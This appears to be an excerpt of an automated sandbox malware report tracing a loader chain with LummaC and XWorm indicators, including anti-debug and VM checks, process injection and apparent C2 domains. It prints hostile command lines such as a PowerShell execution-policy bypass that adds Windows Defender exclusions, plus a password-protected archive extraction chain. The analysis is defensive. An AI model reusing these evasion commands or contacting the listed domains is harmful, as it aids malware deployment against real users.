Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Thread delayed: delay time: 598230
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Thread delayed: delay time: 597969
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Thread delayed: delay time: 597578
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Thread delayed: delay time: 597391
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Thread delayed: delay time: 597219
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Thread delayed: delay time: 597108
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Thread delayed: delay time: 596996
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Thread delayed: delay time: 596874
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Thread delayed: delay time: 596763
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Thread delayed: delay time: 596625
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Thread delayed: delay time: 596468
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Thread delayed: delay time: 596358
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Thread delayed: delay time: 596203
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Thread delayed: delay time: 596088
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Thread delayed: delay time: 595984
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Thread delayed: delay time: 595872
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\main\extracted
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Local\
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\main\
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\

Source: skotes.exe, skotes.exe, 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmp, 950932ab59.exe, 00000034.00000002.3506198317.0000000000CA3000.00000040.00000001.01000000.00000018.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: 0064eff6c8.exe, 00000012.00000003.3063504624.00000000006A6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 4f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-1
Source: 950932ab59.exe, 00000034.00000002.3514958295.000000000151E000.00000004.00000020.00020000.00000000.sdmp, 950932ab59.exe, 00000034.00000003.3458308983.000000000151E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW:
Source: file.exe, 00000001.00000003.2169365759.0000000001770000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: vQeyqr1.exe, 0000000E.00000000.2971558545.0000000000CA2000.00000002.00000001.01000000.0000000C.sdmp	Binary or memory string: vmware
Source: 950932ab59.exe, 00000034.00000002.3512326183.00000000014C8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW0+R
Source: skotes.exe, 00000009.00000002.4662164077.00000000013EC000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000002.4662164077.00000000013BB000.00000004.00000020.00020000.00000000.sdmp, 950932ab59.exe, 00000034.00000002.3514958295.000000000151E000.00000004.00000020.00020000.00000000.sdmp, 950932ab59.exe, 00000034.00000003.3458308983.000000000151E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: file.exe, 00000001.00000003.2169365759.0000000001770000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
Source: file.exe, 00000001.00000002.2197025606.000000000106D000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000002.00000002.2225840476.000000000066D000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmp, 950932ab59.exe, 00000034.00000002.3506198317.0000000000CA3000.00000040.00000001.01000000.00000018.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: RzAAR0y.exe, 0000000B.00000002.4666221685.000001AC38F79000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll!
Source: vQeyqr1.exe, 0000000E.00000002.4744725206.000000001BE60000.00000004.00000020.00020000.00000000.sdmp, 22b0b7688f.exe, 00000018.00000003.3268751727.0000000001E76000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: PING.EXE, 0000002E.00000002.3365474903.0000020749D3B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll}}

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exe	Thread information set: HideFromDebugger

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018875001\2gwmtZs.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018875001\2gwmtZs.exe	Process queried: DebugObjectHandle	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018875001\2gwmtZs.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exe	Process queried: DebugPort

Source: C:\Users\user\Desktop\file.exe

Code function: 1_2_056F0D84 rdtsc

1_2_056F0D84

Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00EA652B mov eax, dword ptr fs:[00000030h]	1_2_00EA652B
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00EAA302 mov eax, dword ptr fs:[00000030h]	1_2_00EAA302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_004AA302 mov eax, dword ptr fs:[00000030h]	2_2_004AA302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_004A652B mov eax, dword ptr fs:[00000030h]	2_2_004A652B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 9_2_004AA302 mov eax, dword ptr fs:[00000030h]	9_2_004AA302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 9_2_004A652B mov eax, dword ptr fs:[00000030h]	9_2_004A652B

Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe'
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe'

Bypasses PowerShell execution policy

Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe'

Injects code into the Windows Explorer (explorer.exe)

Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Memory written: PID: 5128 base: 140000000 value: 4D
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Memory written: PID: 5128 base: 140001000 value: 40
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Memory written: PID: 5128 base: 1402DD000 value: 58
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Memory written: PID: 5128 base: 14040B000 value: A4
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Memory written: PID: 5128 base: 140739000 value: 00
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Memory written: PID: 5128 base: 14075E000 value: 48
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Memory written: PID: 5128 base: 14075F000 value: 48
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Memory written: PID: 5128 base: 140762000 value: 48
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Memory written: PID: 5128 base: 140764000 value: 00
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Memory written: PID: 5128 base: 140765000 value: 00
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Memory written: PID: 5128 base: 11AA010 value: 00

LummaC encrypted strings found

Source: 950932ab59.exe, 00000034.00000003.3408815508.0000000005280000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: rapeflowwj.lat
Source: 950932ab59.exe, 00000034.00000003.3408815508.0000000005280000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: crosshuaht.lat
Source: 950932ab59.exe, 00000034.00000003.3408815508.0000000005280000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: sustainskelet.lat
Source: 950932ab59.exe, 00000034.00000003.3408815508.0000000005280000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: aspecteirs.lat
Source: 950932ab59.exe, 00000034.00000003.3408815508.0000000005280000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: energyaffai.lat
Source: 950932ab59.exe, 00000034.00000003.3408815508.0000000005280000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: necklacebudi.lat
Source: 950932ab59.exe, 00000034.00000003.3408815508.0000000005280000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: discokeyus.lat
Source: 950932ab59.exe, 00000034.00000003.3408815508.0000000005280000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: grannyejh.lat
Source: 950932ab59.exe, 00000034.00000003.3408815508.0000000005280000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: sweepyribs.lat

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe

Thread register set: target process: 5128

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1018875001\2gwmtZs.exe "C:\Users\user\AppData\Local\Temp\1018875001\2gwmtZs.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exe "C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1018896001\28d287a54d.exe "C:\Users\user\AppData\Local\Temp\1018896001\28d287a54d.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe "C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exe "C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe "C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exe "C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018896001\28d287a54d.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe'
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'vQeyqr1.exe'
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mode.com mode 65,10
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e file.zip -p24291711423417250691697322505 -oextracted
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_7.zip -oextracted
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_6.zip -oextracted
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_5.zip -oextracted
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_4.zip -oextracted
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_3.zip -oextracted
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_2.zip -oextracted
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_1.zip -oextracted
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +H "in.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\in.exe "in.exe"
Source: C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move App App.cmd & App.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.0.0.1
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Process created: unknown unknown

Source: RzAAR0y.exe, 0000000B.00000002.4675040044.000001AC39270000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0
Source: RzAAR0y.exe, 0000000B.00000002.4675040044.000001AC39270000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: 950932ab59.exe, 00000034.00000002.3506198317.0000000000CA3000.00000040.00000001.01000000.00000018.sdmp	Binary or memory string: _Program Manager
Source: RzAAR0y.exe, 0000000B.00000002.4675040044.000001AC39270000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
Source: RzAAR0y.exe, 0000000B.00000002.4675040044.000001AC39270000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0@
Source: RzAAR0y.exe, 0000000B.00000002.4675040044.000001AC39270000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager2
Source: skotes.exe, skotes.exe, 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: 3Program Manager

Language, Device and Operating System Detection

Yara detected Telegram Recon

Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\vQeyqr1[1].exe, type: DROPPED

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Code function: 9_2_0048DD91 cpuid

9_2_0048DD91

Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe

Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1018875001\2gwmtZs.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1018875001\2gwmtZs.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1018896001\28d287a54d.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1018896001\28d287a54d.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1018902001\ca733a156b.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1018902001\ca733a156b.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1018903001\08b7ae794c.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1018903001\08b7ae794c.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1018904001\b93717638f.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1018904001\b93717638f.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1018905001\92133eb3c2.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1018905001\92133eb3c2.exe VolumeInformation	Jump to behavior
